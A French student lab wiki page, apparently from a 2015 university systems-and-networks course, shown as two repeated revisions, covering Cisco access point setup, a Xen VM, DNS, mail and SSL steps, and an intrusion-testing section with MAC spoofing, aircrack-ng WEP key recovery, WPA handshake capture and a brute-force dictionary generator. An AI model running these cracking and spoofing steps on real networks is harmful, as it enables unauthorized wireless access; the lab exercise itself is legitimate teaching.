Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23128
TP sysres IMA2a5 2015/2016 G3
2015-11-22T17:47:28Z
<p>Mstrunc : </p>
<hr />
<div>Projet Système & Réseaux IMA2A S9 <br />
<br /><br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>b) Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
